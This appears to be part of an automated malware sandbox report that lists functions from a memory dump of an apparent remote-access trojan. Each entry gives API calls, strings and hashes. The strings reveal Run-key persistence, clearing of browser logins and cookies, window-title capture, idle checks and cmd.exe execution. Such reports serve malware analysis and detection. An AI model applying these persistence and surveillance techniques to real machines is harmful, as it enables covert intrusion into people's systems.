                                                                                                  • Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                                                                                  Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 2005118841-1866435925
                                                                                                  • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                  • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                  Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752E8,74DF37E0,?), ref: 00413888
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752E8,74DF37E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValue
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                  • API String ID: 1818849710-1051519024
                                                                                                  • Opcode ID: 4130c156bc7d53422bd274e0503f6f5712380358a0a777b589ce21756e596352
                                                                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                  • Opcode Fuzzy Hash: 4130c156bc7d53422bd274e0503f6f5712380358a0a777b589ce21756e596352
                                                                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                  Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                  • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                  • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                  Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                  • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
                                                                                                  • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValue
                                                                                                  • String ID: Control Panel\Desktop
                                                                                                  • API String ID: 1818849710-27424756
                                                                                                  • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                  • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                  Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                  • String ID: !D@
                                                                                                  • API String ID: 3446828153-604454484
                                                                                                  • Opcode ID: 299c7e2eac24c2f7a13a1ef740d02627241d5152881cd92f93c311e1267b1ee5
                                                                                                  • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                                                                                  • Opcode Fuzzy Hash: 299c7e2eac24c2f7a13a1ef740d02627241d5152881cd92f93c311e1267b1ee5
                                                                                                  • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                                                                                  Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteShell
                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                  • API String ID: 587946157-3896048727
                                                                                                  • Opcode ID: ba5b8ac7040460dc6065eceb26c8d4705fa8e3e7fffb1ef49e463b9dc02157a1
                                                                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                  • Opcode Fuzzy Hash: ba5b8ac7040460dc6065eceb26c8d4705fa8e3e7fffb1ef49e463b9dc02157a1
                                                                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                  Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                  • Opcode ID: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                  • Instruction ID: dd969ba971dbaa29921178884ad428293cf5128bfb63f122c38d39e9abecacc1
                                                                                                  • Opcode Fuzzy Hash: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                  • Instruction Fuzzy Hash: 3EB09B74541740FB8F102B745D4D5153525A604703B100475F041D6151D7B584009A1E
                                                                                                  Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                  • Opcode ID: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                  • Instruction ID: c0691e7ba4e037ba5be4177d0f13c81de84985c40ff74287bb3597843e96be7a
                                                                                                  • Opcode Fuzzy Hash: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                  • Instruction Fuzzy Hash: 5FB092B8580340FBCB002BA0AD4E91E3A64AA18703B1008ABF041D21A1EBB888009F2F
                                                                                                  Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1036877536-0
                                                                                                  • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                  • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                  Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                  Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3360349984-0
                                                                                                  • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                  • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                  Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                  • Opcode ID: e0c8e38477863af5088d6fe634e6a0ac193c61f6508a68f7b7f24266df6e7c31
                                                                                                  • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                                                                                  • Opcode Fuzzy Hash: e0c8e38477863af5088d6fe634e6a0ac193c61f6508a68f7b7f24266df6e7c31
                                                                                                  • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                                                                                  Function 00412716 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                                                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                                                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQuerySleepValue
                                                                                                  • String ID: HSG$exepath$RG
                                                                                                  • API String ID: 4119054056-4111122955
                                                                                                  • Opcode ID: fa4264ab7ee0f56fbb1436d7a8ba00959a1c70ff335175d8111d710f019c8f65
                                                                                                  • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                                                                                  • Opcode Fuzzy Hash: fa4264ab7ee0f56fbb1436d7a8ba00959a1c70ff335175d8111d710f019c8f65
                                                                                                  • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                                                                                  Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                                  • String ID: [ $ ]
                                                                                                  • API String ID: 3309952895-93608704
                                                                                                  • Opcode ID: 69f93e903a5a9c6d889e9b85f3e5b234b319eb86257ec0e35b47b15ed479ba79
                                                                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                  • Opcode Fuzzy Hash: 69f93e903a5a9c6d889e9b85f3e5b234b319eb86257ec0e35b47b15ed479ba79
                                                                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                  Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                  • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                  Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                  • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                  Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 3919263394-0
                                                                                                  • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                  • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                  Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleOpenProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 39102293-0
                                                                                                  • Opcode ID: 86c9f0b933065f30fb7de588293abdcc028dc5bd0d1024c3ead9711c80f94643
                                                                                                  • Instruction ID: eb9e11a2b0883253d54455b1eb0df9c10e535dd1e95c930e162dea6fb874dde8
                                                                                                  • Opcode Fuzzy Hash: 86c9f0b933065f30fb7de588293abdcc028dc5bd0d1024c3ead9711c80f94643
                                                                                                  • Instruction Fuzzy Hash: 2F01F231680215ABD71066949C8AFA7B66C8B84756F0001ABFA08D2292EE74CD81466A
                                                                                                  Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2633735394-0
                                                                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                  Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 4116985748-0
                                                                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                  Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
